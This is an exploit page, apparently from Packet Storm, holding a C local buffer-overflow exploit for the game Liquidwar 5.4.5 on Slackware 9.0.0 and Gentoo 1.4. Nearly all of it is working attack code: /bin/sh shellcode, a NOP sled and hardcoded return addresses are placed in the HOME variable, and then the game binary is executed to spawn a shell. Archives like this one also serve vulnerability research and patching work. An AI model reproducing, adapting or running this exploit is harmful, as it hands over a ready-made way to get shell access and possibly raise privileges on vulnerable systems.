Liquidwar 5.4.5 local exploit that has been tested on Slackware Linux 9.0.0 and Gentoo Linux 1.4.
6038ccaf0089d0c6b1b982024c5d6232813a117568c7c20900bb183dcfc26458/*
*
* http://www.rosiello.org
* (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Slakware 9.0.0 & Gentoo 1.4
*
* Author: Angelo Rosiello
* Mail : angelo@rosiello.org
* URL : http://www.rosiello.org
*
* Greetz: Astharot by Zone-H who posted the stack overflow bug
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
/* /bin/sh */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
#define NOP 0x90
#define LEN 520 //Buffer for Slackware 9.0.0
//#define LEN 528 //Buffer for Gentoo 1.4
#define RET 0xbffff414 //Valid Address for Slackware 9.0.0
//#define RET 0xbffff360 //Valid Address for Gentoo 1.4
int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
fprintf(stderr, "\n(c) Rosiello Security 2003 - http://www.rosiello.org\n");
fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\n");
fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\n\n");
fprintf(stderr, "using address 0x%lx\n",retaddr);
for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;
for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;
memcpy(buffer+i,shellcode,strlen(shellcode));
/* export the variable, run liquidwar */
setenv("HOME", buffer, 1);
execl("/usr/games/liquidwar","liquidwar",NULL);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed